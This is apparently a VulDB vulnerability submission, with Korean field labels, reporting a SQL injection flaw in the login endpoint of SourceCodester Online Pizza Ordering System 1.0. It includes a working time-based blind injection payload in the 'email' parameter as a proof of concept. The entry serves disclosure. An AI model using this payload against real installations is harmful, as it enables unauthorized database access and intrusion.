| 제목 | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 login page SQL Injection |
|---|
| 설명 | A SQL Injection vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0, remote and unauthenticated attacker can exploit this vulnerability by sending crafted request. The vulnerable URI is /php-opos/admin/ajax.php?action=login2, which is the login page.The parameter 'email' is injectable.
An effective poc is below
POST /php-opos/admin/ajax.php?action=login2 HTTP/1.1
*************************************
email=abc%40qq.com' AND (SELECT 9110 FROM (SELECT(SLEEP(5)))XSlc) AND 'jFNl'='jFNl&password=def
which is a time-based blind injection and the server will response in 5s. |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html |
|---|
| 사용자 | WWesleywww (UID 43117) |
|---|
| 제출 | 2023. 03. 17. AM 07:47 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 03. 17. AM 07:58 (12 minutes later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 223300 [SourceCodester Online Pizza Ordering System 1.0 Login Page ajax.php?action=login2 email SQL 주입] |
|---|
| 포인트들 | 20 |
|---|